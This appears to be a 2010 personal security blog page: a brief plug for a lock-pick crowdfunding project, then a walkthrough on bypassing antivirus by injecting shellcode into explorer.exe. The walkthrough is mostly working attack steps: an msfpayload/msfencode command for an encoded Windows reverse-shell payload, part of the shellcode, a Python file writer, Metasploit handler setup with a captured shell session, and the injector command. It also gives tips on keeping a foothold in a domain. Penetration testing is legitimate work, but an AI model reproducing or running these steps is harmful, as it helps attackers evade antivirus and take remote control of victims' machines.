Friday, August 20, 2010

Open LockSport Donations

A slight divergence from the technical for a moment, everyone should go check out a cool new line of custom lock-picking tools that will be coming out shortly. Pre-Order yours by providing a donation to get the business started. I proudly donated a very large sum to this cause today and setup onsite training as well for a group of my friends with the creator of these lock-picks....


Check it out!!!

http://www.kickstarter.com/projects/schuyler/lockpicks-by-open-locksport/


Generally I like to stay 100% technical posts but this guy was really cool, extremely excited about what he does and thats what I like to see!!! Motivated people with passion about their interests... I am always about supporting individuals like this... So check them out and get yourself a nice set of custom lock-pick tools...

And if youre in the cleveland area and interested in lockpicking, send me a message and i will let you know about lockpicking meet ups.

Tuesday, August 17, 2010

Bypassing AntiVirus With Process Injection

There is a new tool for anti virus bypass which allows an attacker to inject shellcode into a process Post exploitation. Enabling the attacker to pass a shell to a remote location, generally i assume this would be a meterpreter shell for obvious reasons. Those of us who penetration test for a living are aware of the need to sometimes have a shell after obtaining gui system access. Buuuut Antivirus can be a real pain in the ass sometimes.


A few people came to me today saying they tried this new technique and it looked awesome but was not functioning correctly, below is a description of why it was not working for them and how to fix it.. here is a link for the program as reference.

https://sites.google.com/site/mamit30/home/injector

Videos are cool and all but as we know they tend to leave things out, in this case they left out the proper way to create shellcode. They also left out how to create the file to inject into the process, so below is a walkthrough without missing any details of how to get a shell by injecting into a process with injector... Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather then having a distracting song..

Mainly I believe the issues people were having are of bad character sets within their shellcode. (Although I did not verify this in a debugger, the crash behavior leans towards this assumption)

When you inject a payload into a process if any characters are bad such as a Null characters the process will automatically terminate or create undesired results, it doesn't always have to be null and all processes and programs are created differently depending what they are looking for.Encoding is a good way to solve these issues. So lets get to it!!

Original Video: http://vimeo.com/14139105

Issues people had:
-Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)

Resolution:
-Alpha upper encoding
-using the py file to create raw code


So basically the problem people were having is that there are bad characters in their shellcode that were crashing the process, following is a step by step on how to use the antivirus bypass technique that the video does not show clearly and in its entirety....


1. First Create your shell-code: (Alpha upper encode the shellcode, and add a thread exit function)


root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

[*] x86/alpha_upper succeeded with size 699 (iteration=1)
buf =
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +
..........
.................

The output from this will be very large but no worries size doesn't appear to be an issue....


2. Put this shell-code into the generic.py file like so (Remove all + signs and surround the output with parenthesis)


buffer=("\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
............
................. )

file=open("pgeneric.txt","w")
file.write(buffer)



3. Startup your multi-handler and after you receive the payload you will get a shell... (go to step 4 below to send off your payload.)

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.10:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.10:4444 -> 192.168.1.3:2438) at Tue Aug 17 20:30:20 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator> YAY FOR SHELL



4. Check your process list for Explorer.exe then ship off your payload into the process, this payload is now encoded to remove all bad characters and with your multi/handler running you should receive a shell no problem.


C:\Documents and Settings\Administrator\Desktop\injector>tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 244 K
smss.exe 620 Console 0 388 K
csrss.exe 668 Console 0 1,660 K
winlogon.exe 692 Console 0 5,152 K
services.exe 736 Console 0 4,312 K
lsass.exe 748 Console 0 1,544 K
vmacthlp.exe 904 Console 0 2,292 K
svchost.exe 920 Console 0 4,548 K
svchost.exe 1000 Console 0 4,012 K
svchost.exe 1092 Console 0 21,824 K
svchost.exe 1136 Console 0 3,060 K
svchost.exe 1212 Console 0 4,584 K
spoolsv.exe 1416 Console 0 5,476 K
sqlservr.exe 1800 Console 0 8,684 K
sqlwriter.exe 1948 Console 0 3,268 K
notepad++.exe  2104 Console                 0      3,072 K
notepad.exe 3612 Console                 0      3,388 K
explorer.exe 1568 Console                 0     22,064 K
tasklist.exe 1900 Console                 0      4,244 K
wmiprvse.exe 2708 Console                 0      5,404 K

C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us: http://www.garage4hackers.com


C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter


I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest, this is an excellent technique and very neat but explanation of proper payloads and examples were lacking, I would have much preferred a written write up with more detail for reference so that is what i am providing..

Final Note:
Also one final note, you will notice i used the "explorer.exe" process, the reason I used explorer.exe because if I blow it up, it will respawn itself. Also a good technique when migrating processes in Meterpreter, if explorer.exe Fubars, you can just kill the process and it will respawn.  I have used this technique on processes running as a domain administrator to get full domain access. However when I blew up the process I lost access but was able to just respawn it and regain my foothold when no hashes or tokens were available.



.
.